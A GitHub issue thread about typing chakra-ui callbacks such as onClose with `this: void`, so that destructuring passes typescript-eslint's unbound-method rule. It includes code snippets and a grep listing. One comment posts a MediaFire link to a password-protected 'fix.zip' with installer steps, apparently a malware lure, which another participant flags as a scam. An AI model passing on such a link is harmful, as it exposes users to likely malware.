### ISSUE TITLE
(v2) Mark as `this: void` for callback values which is used by user. (@typescript-eslint/unbound-method)

### ISSUE THREAD

**Issue by LumaKernel** [chakra-ui/chakra-ui#8779]
### Description

Some parameters user can use are callbacks. But these callbacks are not marked as `this: void`. So we can't destruct these values from object safely in type-level confidence even if it's safe in runtime.

### Problem Statement/Justification

Like following code, some parameters user can use are callbacks. But these callbacks are not marked as `this: void`.
If so, this bound is not guaranteed to be unrelated by type-level.

```ts
import { useToast } from '@chakra-ui/react';

useToast({
  render: ({ onClose }) => {
    // onClose();
  }
});
```

We cannot do this. Instead, we should do as following to keep this binding:

```ts
import { useToast } from '@chakra-ui/react';

useToast({
  render: (renderProps) => {
    // renderProps.onClose();
  }
});
```

This is because, `onClose` is defined as follows: ( `toast.types-24f022fd.d.ts` )

```ts
interface RenderProps extends UseToastOptions {
    /**
     * Function to close the toast
     */
    onClose(): void;
}
```

This might be fixed as following:

```ts
interface RenderProps extends UseToastOptions {
    /**
     * Function to close the toast
     */
    onClose(this: void): void;
    // or,
    // onClose: () => void;
}
```

Actually, this is restricted by the typescript-eslint rule [@typescript-eslint/unbound-method](https://typescript-eslint.io/rules/unbound-method/).

You can see quick example: https://typescript-eslint.io/play/#ts=5.5.2&fileType=.ts&code=JYOwLgpgTgZghgYwgAgILIN4ChnJge3wAoBKALmQGcwpQBzAbh2QHoW9CiwALYSigG75gAE3JUa9Bq3YB5ANLM2HfBVLIAvAD4JtEIxnIFWAL5YREBABs4UFAnwhqyOBVRMHTsJhXITmlyYCYhIGIA&eslintrc=N4KABGBEBOCuA2BTAzpAXGUEKQAIBcBPABxQGNoBLY-AWhXkoDt8B6WJgIwHsOATWgFtE%2BABbc%2B6KImjRu0SODABfEMqA&tsconfig=N4KABGBEDGD2C2AHAlgGwKYCcDyiAuysAdgM6QBcYoEEkJemy0eAcgK6qoDCAFutAGsylBm3TgwAXxCSgA&tokens=false

### Proposed Solution or API

- Add `this: void` for these callbacks.
- Or, change to arrow function style typing (`() => T`)
- And if it's not safe to destruct in runtime (I believe there're no much cases), change them to be safe for destruct (if possible)

### Additional Information

- Chakra UI: `@chakra-ui/react`: 2.8.2 (current latest)
- `@typescript-eslint/eslint-plugin`: 8.3.0 (current latest)

**Comment by Kudjo-Grand** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by LumaKernel** [comment]
↑ CAUTION: might be scam. DO NOT OPEN.

<details><summary>screenshot</summary>
<p>


<img width="554" alt="image" src="https://github.com/user-attachments/assets/4803b857-5478-4602-bab9-e8ff739d79d5">

</p>
</details>

**Comment by LumaKernel** [comment]
I can quickly list potentially fixable lines by grepping `^\s*[\w\d]+\(.*\):.*[^{]$` (regex)

```ts
packages/components/src/focus-lock/focus-lock.tsx
9:  focus(options?: FocusOptions): void

packages/utils/src/types.ts
8:  focus(options?: FocusOptions): void

packages/components/src/modal/modal.tsx
10:  focus(options?: FocusOptions): void

packages/components/src/slider/use-range-slider.ts
141:  setValueAtIndex(index: number, val: number): void
143:  stepUp(index: number, step?: number): void
144:  stepDown(index: number, step?: number): void
145:  reset(): void

packages/components/src/slider/use-slider.ts
126:  stepUp(step?: number): void
127:  stepDown(step?: number): void
128:  reset(): void
129:  stepTo(value: number): void

packages/components/src/modal/use-modal.ts
20:  onClose(): void

packages/components/src/toast/toast.types.ts
9:  onClose(): void
38:  onRequestRemove(): void

packages/anatomy/src/create-anatomy.ts
4:  toString(): string

packages/components/src/color-mode/storage-manager.ts
10:  get(init?: ColorMode): MaybeColorMode
11:  set(value: ColorMode | "system"): void

website/configs/sandpack-contents/hooks/use-range-slider.js
190:        setValueAtIndex(index: number, val: number): void
192:        stepUp(index: number, step?: number): void
193:        stepDown(index: number, step?: number): void
194:        reset(): void

website/configs/sandpack-contents/hooks/use-slider.js
123:        stepUp(step?: number): void;
124:        stepDown(step?: number): void;
125:        reset(): void;
126:        stepTo(value: number): void;

packages/components/src/media-query/match-media.fixture.ts
7:  addListener(listener: MediaQueryListener): void
8:  removeListener(listener: MediaQueryListener): void
9:  addEventListener(type: "change", listener: MediaQueryListener): void
10:  removeEventListener(type: "change", listener: MediaQueryListener): void
11:  dispatchEvent(event: Event): boolean

packages/components/src/editable/use-editable.ts
13:  focus(options?: FocusOptions): void
```

**Comment by LumaKernel** [comment]
I marked as v2, but it seems it's the same for v3, right?

**Comment by LumaKernel** [comment]
I made the partial resolving PR https://github.com/chakra-ui/chakra-ui/pull/8780 to quickly describe the idea.

**Comment by segunadebayo** [comment]
Thanks for this issue and PR.

v3 doesn't have this issue since it's powered entirely by Ark UI

**Comment by segunadebayo** [comment]
I've updated the code to use the arrow-function version instead.

Will release an update shortly
